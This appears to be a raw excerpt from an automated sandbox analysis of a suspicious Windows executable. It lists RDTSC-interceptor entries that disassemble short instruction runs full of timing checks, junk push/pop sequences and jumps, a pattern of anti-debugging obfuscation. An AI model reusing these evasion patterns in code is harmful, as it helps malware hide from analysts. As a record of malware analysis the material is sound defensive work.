Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEE9EB second address: AEE9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jng 00007FFA68B945B6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AEEB96 second address: AEEBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA692CA423h 0x00000008 jo 00007FFA692CA416h 0x0000000e jmp 00007FFA692CA41Fh 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FFA692CA424h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: AF242A second address: AF2439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFA68B945B6h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B616 second address: B2B61A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B61A second address: B2B63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFA68B945C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B63A second address: B2B63E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B2B63E second address: B2B642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DAEC second address: B3DB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFA692CA41Eh 0x0000000f jne 00007FFA692CA41Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DB1B second address: B3DB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: B3DB1F second address: B3DB23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05BDD second address: C05BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FFA68B945B6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04C47 second address: C04C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04C4B second address: C04C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFA68B945B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFA68B945C7h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C04F4C second address: C04F75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA420h 0x00000007 jno 00007FFA692CA416h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FFA692CA41Bh 0x00000014 push ebx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C052D3 second address: C052F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FFA68B945BCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05464 second address: C0548F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFA692CA41Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007FFA692CA433h 0x00000012 jmp 00007FFA692CA427h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0586F second address: C05893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA68B945C9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C05893 second address: C05897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C08A02 second address: C08A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B4D0 second address: C0B4D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B4D6 second address: C0B4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B890 second address: C0B897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B897 second address: C0B8B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FFA68B945B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8B6 second address: C0B8BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8BC second address: C0B8D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA68B945C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0B8D9 second address: C0B8EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FFA692CA418h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC73 second address: C0CC77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC77 second address: C0CC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA692CA427h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC94 second address: C0CC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FFA68B945B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CC9E second address: C0CCA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CCA8 second address: C0CCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: C0CCAC second address: C0CCB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0007E second address: 6F000A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, E5ABh 0x0000000a popad 0x0000000b sub esp, 18h 0x0000000e jmp 00007FFA68B945BEh 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dx, ax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F000A1 second address: 6F00170 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FFA692CA424h 0x0000000d sub ecx, 787F0998h 0x00000013 jmp 00007FFA692CA41Bh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007FFA692CA429h 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push ecx 0x00000023 mov eax, ebx 0x00000025 pop edx 0x00000026 call 00007FFA692CA424h 0x0000002b pushfd 0x0000002c jmp 00007FFA692CA422h 0x00000031 xor cx, BD88h 0x00000036 jmp 00007FFA692CA41Bh 0x0000003b popfd 0x0000003c pop esi 0x0000003d popad 0x0000003e mov ebx, dword ptr [eax+10h] 0x00000041 pushad 0x00000042 mov dl, 98h 0x00000044 pushad 0x00000045 movzx ecx, dx 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b popad 0x0000004c push esi 0x0000004d pushad 0x0000004e pushfd 0x0000004f jmp 00007FFA692CA420h 0x00000054 add cx, D318h 0x00000059 jmp 00007FFA692CA41Bh 0x0000005e popfd 0x0000005f push ecx 0x00000060 pop eax 0x00000061 popad 0x00000062 mov dword ptr [esp], esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FFA692CA41Ch 0x0000006c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00170 second address: 6F001E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFA68B945C1h 0x00000009 adc ecx, 0940FF66h 0x0000000f jmp 00007FFA68B945C1h 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov esi, dword ptr [759B06ECh] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FFA68B945C8h 0x00000028 sub cl, 00000038h 0x0000002b jmp 00007FFA68B945BBh 0x00000030 popfd 0x00000031 mov ah, A0h 0x00000033 popad 0x00000034 test esi, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFA68B945BEh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F001E7 second address: 6F002C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA41Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FFA692CB2FFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FFA692CA424h 0x00000016 sbb ecx, 5F4946F8h 0x0000001c jmp 00007FFA692CA41Bh 0x00000021 popfd 0x00000022 mov ecx, 51EBD42Fh 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 jmp 00007FFA692CA422h 0x0000002e push eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFA692CA421h 0x00000036 and eax, 6712AE46h 0x0000003c jmp 00007FFA692CA421h 0x00000041 popfd 0x00000042 movzx ecx, bx 0x00000045 popad 0x00000046 xchg eax, edi 0x00000047 jmp 00007FFA692CA423h 0x0000004c call dword ptr [75980B60h] 0x00000052 mov eax, 75F3E5E0h 0x00000057 ret 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007FFA692CA41Bh 0x00000061 xor ecx, 1D73EA2Eh 0x00000067 jmp 00007FFA692CA429h 0x0000006c popfd 0x0000006d jmp 00007FFA692CA420h 0x00000072 popad 0x00000073 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F002C7 second address: 6F0033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000044h 0x0000000b jmp 00007FFA68B945C6h 0x00000010 pop edi 0x00000011 pushad 0x00000012 jmp 00007FFA68B945BEh 0x00000017 push esi 0x00000018 push ebx 0x00000019 pop esi 0x0000001a pop edi 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d pushad 0x0000001e mov ebx, ecx 0x00000020 pushfd 0x00000021 jmp 00007FFA68B945C2h 0x00000026 adc eax, 66342F98h 0x0000002c jmp 00007FFA68B945BBh 0x00000031 popfd 0x00000032 popad 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FFA68B945BBh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0033D second address: 6F0035A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0035A second address: 6F003EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, F0B3h 0x0000000f call 00007FFA68B945C8h 0x00000014 pushfd 0x00000015 jmp 00007FFA68B945C2h 0x0000001a jmp 00007FFA68B945C5h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 push dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FFA68B945C8h 0x0000002d sbb ax, E378h 0x00000032 jmp 00007FFA68B945BBh 0x00000037 popfd 0x00000038 mov dl, ah 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F003EA second address: 6F003FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004DB second address: 6F004E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004E1 second address: 6F004E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F004E5 second address: 6F00537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov esi, edx 0x0000000e jmp 00007FFA68B945C7h 0x00000013 popad 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 je 00007FFAD75C374Fh 0x0000001e jmp 00007FFA68B945C2h 0x00000023 sub eax, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFA68B945BCh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F00537 second address: 6F0053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0053D second address: 6F0055A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi], edi 0x0000000d pushad 0x0000000e mov cx, DB23h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0055A second address: 6F0065A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, 8Bh 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b jmp 00007FFA692CA427h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 pushad 0x00000014 jmp 00007FFA692CA424h 0x00000019 jmp 00007FFA692CA422h 0x0000001e popad 0x0000001f mov dword ptr [esi+0Ch], eax 0x00000022 jmp 00007FFA692CA420h 0x00000027 mov eax, dword ptr [ebx+4Ch] 0x0000002a pushad 0x0000002b mov esi, 24CF1B7Dh 0x00000030 mov cx, F279h 0x00000034 popad 0x00000035 mov dword ptr [esi+10h], eax 0x00000038 jmp 00007FFA692CA424h 0x0000003d mov eax, dword ptr [ebx+50h] 0x00000040 jmp 00007FFA692CA420h 0x00000045 mov dword ptr [esi+14h], eax 0x00000048 jmp 00007FFA692CA420h 0x0000004d mov eax, dword ptr [ebx+54h] 0x00000050 jmp 00007FFA692CA420h 0x00000055 mov dword ptr [esi+18h], eax 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007FFA692CA41Dh 0x0000005f and al, 00000006h 0x00000062 jmp 00007FFA692CA421h 0x00000067 popfd 0x00000068 popad 0x00000069 mov eax, dword ptr [ebx+58h] 0x0000006c jmp 00007FFA692CA41Eh 0x00000071 mov dword ptr [esi+1Ch], eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeRDTSC instruction interceptor: First address: 6F0065A second address: 6F00677 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00677 second address: 6F00687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA41Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00787 second address: 6F0078B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0078B second address: 6F00791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00791 second address: 6F007AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA68B945C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F007AA second address: 6F0087F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c pushad 0x0000000d mov bh, AEh 0x0000000f jmp 00007FFA692CA424h 0x00000014 popad 0x00000015 mov ax, word ptr [ebx+00000088h] 0x0000001c pushad 0x0000001d mov al, CAh 0x0000001f pushfd 0x00000020 jmp 00007FFA692CA423h 0x00000025 sub ah, 0000005Eh 0x00000028 jmp 00007FFA692CA429h 0x0000002d popfd 0x0000002e popad 0x0000002f mov word ptr [esi+32h], ax 0x00000033 jmp 00007FFA692CA41Eh 0x00000038 mov eax, dword ptr [ebx+0000008Ch] 0x0000003e jmp 00007FFA692CA420h 0x00000043 mov dword ptr [esi+34h], eax 0x00000046 pushad 0x00000047 mov ecx, 33BBAA5Dh 0x0000004c pushfd 0x0000004d jmp 00007FFA692CA41Ah 0x00000052 jmp 00007FFA692CA425h 0x00000057 popfd 0x00000058 popad 0x00000059 mov eax, dword ptr [ebx+18h] 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f pushfd 0x00000060 jmp 00007FFA692CA41Ah 0x00000065 sub cx, 4518h 0x0000006a jmp 00007FFA692CA41Bh 0x0000006f popfd 0x00000070 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0087F second address: 6F00883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00883 second address: 6F008E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FFA692CA426h 0x0000000c adc ecx, 5BF32F78h 0x00000012 jmp 00007FFA692CA41Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c pushad 0x0000001d pushad 0x0000001e mov ax, 15C1h 0x00000022 mov si, 4CFDh 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+1Ch] 0x0000002b jmp 00007FFA692CA424h 0x00000030 mov dword ptr [esi+3Ch], eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov ah, B3h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F008E1 second address: 6F008F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+20h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA68B945BAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F008F7 second address: 6F0091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bl, FCh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+40h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFA692CA425h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0091B second address: 6F00945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFA68B945BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00945 second address: 6F0094B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0094B second address: 6F00988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d jmp 00007FFA68B945C6h 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, EBD0h 0x0000001a mov cx, dx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00988 second address: 6F0099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA692CA421h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F0099D second address: 6F009C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFA68B945BCh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFA68B945BAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F009C1 second address: 6F009C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F009C7 second address: 6F009F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FFA68B945C0h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00A93 second address: 6F00AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA692CA429h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FFAD7CF9029h 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 pushfd 0x00000014 jmp 00007FFA692CA429h 0x00000019 and si, 5E06h 0x0000001e jmp 00007FFA692CA421h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebp-0Ch] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00AF5 second address: 6F00B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA68B945BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00B08 second address: 6F00B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exe RDTSC instruction interceptor: First address: 6F00B0D second address: 6F00B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
